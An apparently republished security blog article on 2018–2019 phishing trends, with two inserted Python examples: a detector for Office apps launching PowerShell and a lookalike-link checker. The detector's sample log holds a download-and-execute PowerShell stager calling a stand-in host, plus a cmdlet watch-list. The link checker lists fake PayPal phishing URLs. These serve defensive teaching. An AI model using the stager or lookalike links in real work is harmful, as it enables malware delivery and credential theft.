Winter’s Cold Won’t Put a Freeze on Phishing

2018 was the year of the phish, and phishing attacks are only growing more sophisticated

Despite the bitter temperatures that January brings, fishing enthusiasts will brave the cold and traverse across the ice with saws and augers to drop a line or a spear in hopes of catching something. As it is on Lake Erie, so it is in the digital world. Freezing or not, on ice or online, “a phisher’s gonna phish.”

Just as the techniques of ice fishing have evolved over the past decades, so, too, have online phishing attacks grown more sophisticated. If 2017 was the year of ransomware, 2018 was the year of the phish, according to Proofpoint’s “State of the Phish 2019.”

It’s true that email has long been the attack vector of choice for many hackers, but “social engineering techniques are also used outside of email to gather data and infiltrate your organization. Cybercriminals regularly use pretexting, vishing, and smishing attacks to try to penetrate your defenses,” according to the report.

Many organizations have started incorporating simulated attacks into their security awareness training, which has pushed attackers to become more creative. The “2019 State of Malware Report” recently published by Malwarebytes found that Emotet and TrickBot were effectively used in attacks that included “distribution via malspam disguised as legitimate email—your classic phishing/spear phishing campaign.”

Understanding New Phishing Trends

With the explosion of Office 365, attacks have evolved into more coordinated, multi-phased events.

“Phishing used to be much more isolated: hackers would send a PayPal phishing email to harvest credentials and immediately extract the funds associated with those accounts,” said Adrien Gendre, Vade Secure chief solutions architect. “Hackers first send phishing emails to harvest Office 365 credentials. Then, they use those compromised accounts to conduct targeted attacks laterally within the organization.”

In fact, Carbon Black reported in its recently published “2019 Global Threat Report” that nearly 60 percent of attacks today involve lateral movement. In other words, attackers are getting into networks and lurking there, identifying additional targets as they move through the successive stages of an attack.

“It’s actually easier and more effective to take this phased approach because the spear phishing emails come from legitimate accounts inside your company—making the attacks virtually impossible to detect,” Gendre said.

Malicious actors are also exploiting zero-day vulnerabilities in browsers and plugins; according to Malwarebytes, these exploits were combined with spear phishing or social engineering lures embedded in Office files.

Non-malware and fileless attacks also floated to the top as one of last year’s most popular attack methods. According to Carbon Black, “These types of attacks often originated from phishing campaigns that are leveraging Microsoft Office Word documents with obfuscated VBScripts. … This represented an evolution of current macro attack techniques, where these types of cmdlets are not typically associated with phishing campaigns.”
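The macro-to-PowerShell chain described above leaves one reliable trace on the endpoint: a process-creation event whose parent is an Office application and whose child is a script host, often with a base64 `-EncodedCommand` argument. The following is an added example, not code from the original article or from Carbon Black or Malwarebytes. It runs the check over constructed Sysmon-style (Event ID 1) JSON records; the event field names, the stager string and the watch-list of cmdlets are assumptions for illustration.

```python
import base64
import json
import re

# Office applications that should rarely spawn interpreters, and the script hosts
# and LOLBins a macro typically launches (compared on the lower-cased basename).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# Cmdlets and .NET calls common in stager one-liners (assumed watch-list).
SUSPICIOUS = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|Net\.WebClient|"
    r"Invoke-WebRequest|\biwr\b|FromBase64String|Start-Process|-bxor", re.IGNORECASE)


def basename(path: str) -> str:
    """Last component of a Windows path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand payload, or None if absent/invalid.

    powershell.exe accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...);
    the argument is base64 of a UTF-16LE string and its '=' padding may be stripped.
    """
    tokens = cmdline.split()
    for i in range(len(tokens) - 1):
        switch = tokens[i].lstrip("-/").lower()
        if switch and "encodedcommand".startswith(switch):
            b64 = tokens[i + 1].strip("'\"")
            try:
                raw = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def detect_office_spawn(events):
    """Flag process-creation events where an Office app launched a script host.

    Each finding carries the decoded PowerShell command (if any) and the
    watch-list indicators matched in the decoded text or raw command line.
    """
    findings = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        parent, child = basename(ev.get("ParentImage", "")), basename(ev.get("Image", ""))
        if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
            continue
        cmdline = ev.get("CommandLine", "")
        decoded = decode_encoded_command(cmdline) if child in ("powershell.exe", "pwsh.exe") else None
        indicators = sorted({m.group(0) for m in SUSPICIOUS.finditer(decoded or cmdline)})
        findings.append({"parent": parent, "child": child, "decoded": decoded,
                         "indicators": indicators})
    return findings


# Constructed sample records (no real incident data) shaped like Sysmon Event ID 1
# exported as JSON lines. The stager one-liner is invented for illustration.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage.example/a')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"EventID": 1,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -enc " + ENC},
    {"EventID": 1,  # benign: scheduled script launched from Explorer
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"EventID": 1,  # benign: Word spawning the print spooler helper
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
])


def run_on_log(text: str):
    """Parse JSON lines and return the findings for them."""
    return detect_office_spawn(json.loads(line) for line in text.splitlines() if line.strip())


if __name__ == "__main__":
    for f in run_on_log(SAMPLE_LOG):
        print(f"{f['parent']} -> {f['child']}: {f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Only the first record is flagged: the parent/child pairing alone is the alert condition, and decoding the `-enc` argument is what turns an opaque command line into the readable download-and-execute stager the report describes. Tune `OFFICE_PARENTS` and `SCRIPT_HOSTS` to the environment; add-ins that legitimately spawn `cmd.exe` from Excel are the usual source of noise.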

Attackers are also marrying two techniques into one single attack, as was reported by MalwareHunterTeam. In a recently discovered ransomware attack, researchers found that victims trying to pay the ransom were directed to a PayPal landing page that was actually a link to a phishing page, where their login credentials were stolen.
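The combined attack above works because a link that says "PayPal" need not go to PayPal. The check an analyst (or a mail gateway) wants is whether the host the browser will actually connect to is the expected domain or a subdomain of it, after stripping the tricks that make lookalike links pass a glance: userinfo before an `@`, the expected name used as a leading label, a path segment, or a homograph. The following is an added example, not code from the original article or from MalwareHunterTeam; the sample links are constructed and do not come from any real campaign.

```python
from urllib.parse import urlsplit


def actual_host(url: str):
    """Host a browser would connect to for this link, in ASCII (IDNA) form, or None
    if the link is not an http(s) URL. urlsplit().hostname already discards userinfo
    (the "paypal.com@" in "https://paypal.com@evil.example/") and the port, and
    lower-cases the result."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None
    try:
        return parts.hostname.encode("idna").decode("ascii").rstrip(".")
    except UnicodeError:
        return None


def link_goes_to(url: str, expected_domain: str) -> bool:
    """True only if the link lands on expected_domain or one of its subdomains.
    Matching is on whole labels, so "paypal.com.evil.example" and "notpaypal.com"
    both fail; a homograph such as "pаypal.com" (Cyrillic а) becomes an xn-- label
    under IDNA and fails as well."""
    host = actual_host(url)
    expected = expected_domain.lower().rstrip(".")
    return host is not None and (host == expected or host.endswith("." + expected))


# Constructed sample links of the kinds a ransom note or phishing mail might carry
# while claiming to point at PayPal. Only the first is genuine.
SAMPLE_LINKS = [
    "https://www.paypal.com/signin",
    "https://www.paypal.com.account-verify.example/login",
    "https://paypal.com@203.0.113.7/login",
    "https://pаypal.com/login",            # Cyrillic 'а' in the first label
    "http://secure-paypal.example/paypal.com/",
    "javascript:window.location='https://evil.example'",
]


def triage(links, expected_domain="paypal.com"):
    """Map each link to (actual host, verdict) for a quick analyst read-out."""
    return {u: (actual_host(u), link_goes_to(u, expected_domain)) for u in links}


if __name__ == "__main__":
    for url, (host, ok) in triage(SAMPLE_LINKS).items():
        print(f"{'OK  ' if ok else 'FAIL'} {str(host):40} {url}")
```

The verdict is deliberately based on the resolved host, not on the presence of the brand name anywhere in the URL; a redirector on a legitimate domain would still pass this test, so it is a first filter, not proof that the landing page is safe.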

How to Get Ahead of a Big Phish

The Proofpoint report found that 83 percent of security professionals saw a higher rate of phishing attacks of all types in 2018, so educating employees has never been more essential. In fact, nearly 60 percent of organizations running such awareness programs reported a marked increase in their employees’ ability to detect suspicious emails.

Though many employees were able to correctly define phishing, only 23 percent correctly identified smishing (SMS phishing) and as few as 18 percent knew what vishing (voice phishing) is. Part of the problem is that the tides continue to change, resulting in a constant ebb and flow of what employees need to know.

Education has to evolve at the pace of the threats; it is not a one-shot annual box-check. In a press release, Joe Ferrara, general manager of security awareness training for Proofpoint, noted: “As these threats grow in scope and sophistication, it is critical that organizations prioritize security awareness training to educate employees about cybersecurity best practices and establish a people-centric strategy to defend against threat actors’ unwavering focus on compromising end users.”

Kacy Zurkus



Prior to joining RSA Conference as a Content Strategist, Kacy Zurkus was a cybersecurity and InfoSec freelance writer as well as a content producer for Reed Exhibition's security portfolio. Zurkus was a regular contributor to Dark Reading, Infosecurity Magazine, Security Boulevard and IBM's Security Intelligence, and has also contributed to several industry publications, including CSO Online, The Parallax, and K12 Tech Decisions. During her time as a journalist, she covered a variety of security and risk topics and spoke on a range of cybersecurity topics at conferences and universities, including SecureWorld Denver, NICE K12 Cybersecurity in Education and the University of Southern California. Zurkus has nearly 20 years of experience as a high school English teacher and holds an MFA in Creative Writing from Lesley University (2011), a Master's in Education from the University of Massachusetts (1999) and a BA in English from Regis College (1996).
